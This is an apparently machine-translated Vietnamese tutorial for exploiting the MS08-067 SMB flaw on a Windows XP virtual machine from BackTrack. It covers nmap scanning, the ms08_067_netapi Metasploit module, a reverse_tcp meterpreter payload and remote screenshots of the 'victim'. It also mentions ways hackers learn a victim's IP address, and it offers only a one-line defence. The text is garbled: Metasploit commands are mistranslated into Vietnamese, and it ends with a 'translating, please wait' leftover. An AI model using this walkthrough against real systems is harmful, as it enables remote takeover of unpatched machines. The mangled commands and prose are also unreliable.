Bước 1:Tạo hai ảo Machine(VM), cụ thể là "mục tiêu" và "BT5". Cài đặt XP bên trong mục tiêu máy ảo và quay lại bên trong BT5. Bắt đầu hai VMs.Nếu bạn không biết làm thế nào để tạo ra các máy ảo, sau đó xin vui lòng đọc hướng dẫn sử dụng VirtualBox này.Bước 2: Tìm địa chỉ IP của mục tiêuMở dấu nhắc lệnh trong mục tiêu machine(XP). Gõ vào "ipconfig" để tìm các địa chỉ IP của hệ thống nhắm mục tiêu.Hacker sử dụng các phương pháp khác nhau cho việc tìm kiếm địa chỉ ip của nạn nhân. Cho Eg., bằng cách gửi liên kết mà sẽ nhận được thông tin chi tiết của ip hoặc sử dụng tức giận IP máy quét.Bước 3: Thông tin thu thậpBây giờ hãy cho chúng tôi thu thập một số thông tin về máy tính mục tiêu. Cho mục đích này, chúng tôi sẽ sử dụng công cụ nmap.Mở The Terminal BT5 machine(Backtrack) và gõ "nmap - O 192.168.56.12". Đây 192.168.56.12 là địa chỉ IP của máy tính mục tiêu. Nếu bạn nhìn vào kết quả, bạn có thể tìm thấy danh sách các cổng mở và phiên bản hệ điều hành.Bước 4: MetasploitBây giờ mở nhà ga ở BT5 machine(Backtrack) và loại "msfconsole".Msfconsole là các giao diện phổ biến nhất cho các khuôn khổ Metasploit. Nó cung cấp một giao diện điều khiển tập trung "tất cả-trong-một" và cho phép bạn truy cập hiệu quả cho hầu như tất cả các tùy chọn có sẵn trong khuôn khổ Metasploit.Chúng ta hãy sử dụng lệnh tìm kiếm để tìm các mô-đun khai thác với từ khóa netapi. Loại "công cụ tìm netapi". Bây giờ bạn có thể xem danh sách các mô-đun kết hợp với netapi.Chúng ta sẽ khai thác lỗ hổng MS08-067, vì vậy, loại "sử dụng khai thác/windows/smb/ms08_067_netapi".Bước 5: Thiết lập tải trọngNhư thường lệ, cho phép sử dụng Tcp đảo ngược trọng khai thác này cũng. Loại "thiết lập tải windows-meterpreter-reverse_tcp" trong msfconsole.Bước 6: lựa chọnGõ "thiết lập LHOST 192.168.56.10". Đây 192.168.56.10 là địa chỉ IP của máy tính Backtrack. Bạn có thể tìm thấy địa chỉ ip bằng cách gõ lệnh 'ifconfig' tại nhà ga.Gõ "thiết lập RHOST 192.168.56.12". Đây 192.168.56.12 là địa chỉ IP của máy tính mục tiêu.Bước 7: khai thácOK, nó là thời gian để khai thác các lỗ hổng, loại "khai thác" trong giao diện điều khiển. Nếu việc khai thác thành công, bạn có thể xem kết quả sau.Bây giờ chúng ta có thể điều khiển máy tính từ xa bằng cách sử dụng meterpreter. Ví dụ: nhập "ảnh chụp màn hình" sẽ lấy ảnh chụp màn hình của hệ thống của nạn nhân.Biện pháp đối phó:Cập nhật hệ điều hành của bạn thường xuyên.
đang được dịch, vui lòng đợi..
